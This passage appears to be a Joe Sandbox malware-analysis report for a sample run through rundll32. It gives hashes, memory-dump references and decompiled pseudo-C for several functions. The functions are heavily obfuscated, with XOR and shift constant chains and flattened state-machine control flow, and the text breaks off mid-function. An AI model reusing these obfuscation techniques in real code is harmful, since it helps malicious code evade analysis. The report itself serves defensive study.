                                                                                                                    0x00348e70
                                                                                                                    0x00348e73
                                                                                                                    0x00348e76
                                                                                                                    0x00348e7d
                                                                                                                    0x00348e7e
                                                                                                                    0x00348e81
                                                                                                                    0x00348e81
                                                                                                                    0x00348ea2
                                                                                                                    0x00348ea7
                                                                                                                    0x00348ead
                                                                                                                    0x00348eb2
                                                                                                                    0x00348eb3
                                                                                                                    0x00348eb5
                                                                                                                    0x00348eb7
                                                                                                                    0x00348ebc
                                                                                                                    0x00348ec2
                                                                                                                    0x00348ec8
                                                                                                                    0x00348ec9
                                                                                                                    0x00348eca
                                                                                                                    0x00348ecc
                                                                                                                    0x00348ed1
                                                                                                                    0x00348ed4
                                                                                                                    0x00348ed7
                                                                                                                    0x00348ede
                                                                                                                    0x00348edf
                                                                                                                    0x00348ee2
                                                                                                                    0x00348ee5
                                                                                                                    0x00348ee5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ulG$wV
                                                                                                                    • API String ID: 0-391097709
                                                                                                                    • Opcode ID: 2bb94bd1118e86fdc4f233d1fc99bbf71a5ea20dec33582707e194fbf905f39d
                                                                                                                    • Instruction ID: b53bc0bc68d93b77556ce109d8a031fc680025fb17c8477fd16dfccfb480e39a
                                                                                                                    • Opcode Fuzzy Hash: 2bb94bd1118e86fdc4f233d1fc99bbf71a5ea20dec33582707e194fbf905f39d
                                                                                                                    • Instruction Fuzzy Hash: 04914471D01319EBDB14DFE9D88A9DEBBB1FF44314F208109E216BA2A0D7B01A46CF95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00336D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00336D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E00339DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00334EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E0034DCF7(_v556, 0x331000, __eflags);
							_t173 =  *0x353e10; // 0x0
							_t188 =  *0x353e10; // 0x0
							E003347CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E0033A8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E0033B6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                    0x00336d2a
                                                                                                                    0x00336d34
                                                                                                                    0x00336d3c
                                                                                                                    0x00336d41
                                                                                                                    0x00336d49
                                                                                                                    0x00336d51
                                                                                                                    0x00336d56
                                                                                                                    0x00336d5b
                                                                                                                    0x00336d63
                                                                                                                    0x00336d75
                                                                                                                    0x00336d7a
                                                                                                                    0x00336d80
                                                                                                                    0x00336d88
                                                                                                                    0x00336d90
                                                                                                                    0x00336d98
                                                                                                                    0x00336da0
                                                                                                                    0x00336da8
                                                                                                                    0x00336db0
                                                                                                                    0x00336db5
                                                                                                                    0x00336dbd
                                                                                                                    0x00336dc5
                                                                                                                    0x00336dd2
                                                                                                                    0x00336dd5
                                                                                                                    0x00336dd9
                                                                                                                    0x00336de1
                                                                                                                    0x00336de9
                                                                                                                    0x00336df1
                                                                                                                    0x00336dfb
                                                                                                                    0x00336dff
                                                                                                                    0x00336e07
                                                                                                                    0x00336e0f
                                                                                                                    0x00336e17
                                                                                                                    0x00336e1f
                                                                                                                    0x00336e27
                                                                                                                    0x00336e2f
                                                                                                                    0x00336e37
                                                                                                                    0x00336e3f
                                                                                                                    0x00336e47
                                                                                                                    0x00336e4f
                                                                                                                    0x00336e54
                                                                                                                    0x00336e5c
                                                                                                                    0x00336e64
                                                                                                                    0x00336e6c
                                                                                                                    0x00336e74
                                                                                                                    0x00336e7c
                                                                                                                    0x00336e84
                                                                                                                    0x00336e94
                                                                                                                    0x00336e98
                                                                                                                    0x00336ea0
                                                                                                                    0x00336ea8
                                                                                                                    0x00336eb0
                                                                                                                    0x00336eb8
                                                                                                                    0x00336ec4
                                                                                                                    0x00336ec7
                                                                                                                    0x00336ecb
                                                                                                                    0x00336ed3
                                                                                                                    0x00336edb
                                                                                                                    0x00336ee0
                                                                                                                    0x00336ee8
                                                                                                                    0x00336ef0
                                                                                                                    0x00336efa
                                                                                                                    0x00336f08
                                                                                                                    0x00336f15
                                                                                                                    0x00336f1e
                                                                                                                    0x00336f23
                                                                                                                    0x00336f2b
                                                                                                                    0x00336f38
                                                                                                                    0x00336f3c
                                                                                                                    0x00336f44
                                                                                                                    0x00336f44
                                                                                                                    0x00336f4e
                                                                                                                    0x00000000
                                                                                                                    0x0033701e
                                                                                                                    0x00336f56
                                                                                                                    0x00336f68
                                                                                                                    0x00336f71
                                                                                                                    0x00336f79
                                                                                                                    0x00336f8a
                                                                                                                    0x00336fa2
                                                                                                                    0x00336fb2
                                                                                                                    0x00336fc1
                                                                                                                    0x00336fc6
                                                                                                                    0x00336fc9
                                                                                                                    0x00000000
                                                                                                                    0x00336fc9
                                                                                                                    0x00336f5e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00336f64
                                                                                                                    0x00336f64
                                                                                                                    0x00336fe0
                                                                                                                    0x00336fe7
                                                                                                                    0x00336fe9
                                                                                                                    0x00336fec
                                                                                                                    0x00336fee
                                                                                                                    0x00336fee
                                                                                                                    0x00336fee
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Gx\$e2
                                                                                                                    • API String ID: 0-3912940318
                                                                                                                    • Opcode ID: d4afd1af54017eb52f16f819640dfef15dd41f441739bd08bfdf9aacbf9192a3
                                                                                                                    • Instruction ID: 6f386e17b20bcb379038051271e239cde12ab595e2535d0f4c8b4fec4fce0d50
                                                                                                                    • Opcode Fuzzy Hash: d4afd1af54017eb52f16f819640dfef15dd41f441739bd08bfdf9aacbf9192a3
                                                                                                                    • Instruction Fuzzy Hash: A77131711083419FC769CF25D88A81FBBF1FBC4758F109A1DF2969A260D3B19949CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033A55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0033A55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E0034DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x353e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E00333BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E0033CB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                    0x0033a55f
                                                                                                                    0x0033a565
                                                                                                                    0x0033a56c
                                                                                                                    0x0033a571
                                                                                                                    0x0033a576
                                                                                                                    0x0033a57e
                                                                                                                    0x0033a590
                                                                                                                    0x0033a595
                                                                                                                    0x0033a5a0
                                                                                                                    0x0033a5a3
                                                                                                                    0x0033a5a7
                                                                                                                    0x0033a5af
                                                                                                                    0x0033a5b7
                                                                                                                    0x0033a5bb
                                                                                                                    0x0033a5c0
                                                                                                                    0x0033a5c8
                                                                                                                    0x0033a5d0
                                                                                                                    0x0033a5d8
                                                                                                                    0x0033a5dd
                                                                                                                    0x0033a5e5
                                                                                                                    0x0033a5ed
                                                                                                                    0x0033a5f5
                                                                                                                    0x0033a5fd
                                                                                                                    0x0033a605
                                                                                                                    0x0033a612
                                                                                                                    0x0033a616
                                                                                                                    0x0033a61e
                                                                                                                    0x0033a626
                                                                                                                    0x0033a62e
                                                                                                                    0x0033a63e
                                                                                                                    0x0033a642
                                                                                                                    0x0033a64a
                                                                                                                    0x0033a652
                                                                                                                    0x0033a65a
                                                                                                                    0x0033a662
                                                                                                                    0x0033a66a
                                                                                                                    0x0033a672
                                                                                                                    0x0033a67a
                                                                                                                    0x0033a682
                                                                                                                    0x0033a68a
                                                                                                                    0x0033a692
                                                                                                                    0x0033a69a
                                                                                                                    0x0033a69f
                                                                                                                    0x0033a6a7
                                                                                                                    0x0033a6af
                                                                                                                    0x0033a6b7
                                                                                                                    0x0033a6c0
                                                                                                                    0x0033a6c5
                                                                                                                    0x0033a6c9
                                                                                                                    0x0033a6d1
                                                                                                                    0x0033a6df
                                                                                                                    0x0033a6e4
                                                                                                                    0x0033a6e8
                                                                                                                    0x0033a6f0
                                                                                                                    0x0033a6f8
                                                                                                                    0x0033a706
                                                                                                                    0x0033a70a
                                                                                                                    0x0033a71a
                                                                                                                    0x0033a726
                                                                                                                    0x0033a72f
                                                                                                                    0x0033a73c
                                                                                                                    0x0033a73c
                                                                                                                    0x0033a742
                                                                                                                    0x0033a772
                                                                                                                    0x0033a777
                                                                                                                    0x0033a77a
                                                                                                                    0x00000000
                                                                                                                    0x0033a77a
                                                                                                                    0x0033a746
                                                                                                                    0x0033a7f0
                                                                                                                    0x0033a7f5
                                                                                                                    0x00000000
                                                                                                                    0x0033a80f
                                                                                                                    0x0033a752
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a758
                                                                                                                    0x0033a758
                                                                                                                    0x0033a77e
                                                                                                                    0x0033a78f
                                                                                                                    0x0033a793
                                                                                                                    0x0033a79b
                                                                                                                    0x0033a7b3
                                                                                                                    0x0033a7bc
                                                                                                                    0x0033a7bf
                                                                                                                    0x0033a7d3
                                                                                                                    0x0033a7d3
                                                                                                                    0x0033a7d7
                                                                                                                    0x0033a7d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a7c4
                                                                                                                    0x0033a7c8
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7d0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ce
                                                                                                                    0x0033a7dd
                                                                                                                    0x0033a7e0
                                                                                                                    0x0033a7e0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7e0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7ce
                                                                                                                    0x00000000
                                                                                                                    0x0033a7e2
                                                                                                                    0x0033a7e2
                                                                                                                    0x0033a7e2
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: QNiA$sz
                                                                                                                    • API String ID: 0-294658094
                                                                                                                    • Opcode ID: 1f4941f720a8779093e3a8e717afcec7fb2842502ca3bffc690faba2b4534d0a
                                                                                                                    • Instruction ID: e84cfefc93233835e0451a302956ca89210680984ee59740d2f27b18808b368e
                                                                                                                    • Opcode Fuzzy Hash: 1f4941f720a8779093e3a8e717afcec7fb2842502ca3bffc690faba2b4534d0a
                                                                                                                    • Instruction Fuzzy Hash: 21715131509341ABC398CF66D98981FBBF1FBC4718F404A1DF5C6AA260D3758A098F87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00340B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00340B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x353208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E00348519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E00338DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E00349E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E00341E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                    0x00340b19
                                                                                                                    0x00340b1c
                                                                                                                    0x00340b26
                                                                                                                    0x00340b32
                                                                                                                    0x00340b3a
                                                                                                                    0x00340b3e
                                                                                                                    0x00340b40
                                                                                                                    0x00340b48
                                                                                                                    0x00340b4e
                                                                                                                    0x00340b56
                                                                                                                    0x00340b5e
                                                                                                                    0x00340b66
                                                                                                                    0x00340b6e
                                                                                                                    0x00340b76
                                                                                                                    0x00340b7e
                                                                                                                    0x00340b86
                                                                                                                    0x00340b8e
                                                                                                                    0x00340b96
                                                                                                                    0x00340b9e
                                                                                                                    0x00340ba2
                                                                                                                    0x00340baa
                                                                                                                    0x00340bb2
                                                                                                                    0x00340bba
                                                                                                                    0x00340bc2
                                                                                                                    0x00340bca
                                                                                                                    0x00340bd8
                                                                                                                    0x00340bdd
                                                                                                                    0x00340be3
                                                                                                                    0x00340be8
                                                                                                                    0x00340bf0
                                                                                                                    0x00340bf8
                                                                                                                    0x00340bfd
                                                                                                                    0x00340c02
                                                                                                                    0x00340c0a
                                                                                                                    0x00340c12
                                                                                                                    0x00340c1a
                                                                                                                    0x00340c22
                                                                                                                    0x00340c2a
                                                                                                                    0x00340c32
                                                                                                                    0x00340c3e
                                                                                                                    0x00340c43
                                                                                                                    0x00340c4d
                                                                                                                    0x00340c52
                                                                                                                    0x00340c58
                                                                                                                    0x00340c60
                                                                                                                    0x00340c68
                                                                                                                    0x00340c74
                                                                                                                    0x00340c77
                                                                                                                    0x00340c7b
                                                                                                                    0x00340c83
                                                                                                                    0x00340c8b
                                                                                                                    0x00340c93
                                                                                                                    0x00340c98
                                                                                                                    0x00340ca0
                                                                                                                    0x00340ca8
                                                                                                                    0x00340cb0
                                                                                                                    0x00340cbd
                                                                                                                    0x00340cc1
                                                                                                                    0x00340cc9
                                                                                                                    0x00340cd9
                                                                                                                    0x00340cdc
                                                                                                                    0x00340ce0
                                                                                                                    0x00340ce5
                                                                                                                    0x00340ced
                                                                                                                    0x00340cf5
                                                                                                                    0x00340cfd
                                                                                                                    0x00340d05
                                                                                                                    0x00340d0d
                                                                                                                    0x00340d15
                                                                                                                    0x00340d1d
                                                                                                                    0x00340d22
                                                                                                                    0x00340d9d
                                                                                                                    0x00340d9d
                                                                                                                    0x00340da1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00340d2f
                                                                                                                    0x00340d8a
                                                                                                                    0x00340d95
                                                                                                                    0x00340d97
                                                                                                                    0x00340d31
                                                                                                                    0x00340d41
                                                                                                                    0x00340d45
                                                                                                                    0x00340d4a
                                                                                                                    0x00340d51
                                                                                                                    0x00340dab
                                                                                                                    0x00340d53
                                                                                                                    0x00340d58
                                                                                                                    0x00340d6a
                                                                                                                    0x00340d82
                                                                                                                    0x00340d87
                                                                                                                    0x00000000
                                                                                                                    0x00340d87
                                                                                                                    0x00340d51
                                                                                                                    0x00340d2f
                                                                                                                    0x00340daa

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1$
                                                                                                                    • API String ID: 0-209397207
                                                                                                                    • Opcode ID: ffe31568afe234130f2180faa261556fb5a1850211eb848edc669cc9da0fb6fe
                                                                                                                    • Instruction ID: b974f36f4bb465da7cb480c5234fc8f23657acac3b493c401eee50c3441ed6be
                                                                                                                    • Opcode Fuzzy Hash: ffe31568afe234130f2180faa261556fb5a1850211eb848edc669cc9da0fb6fe
                                                                                                                    • Instruction Fuzzy Hash: 40613FB25083419FC399CF21D48940BBBF1FFC9768F509A1DF19696260D7B1EA4A8F42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033AEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E0033AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
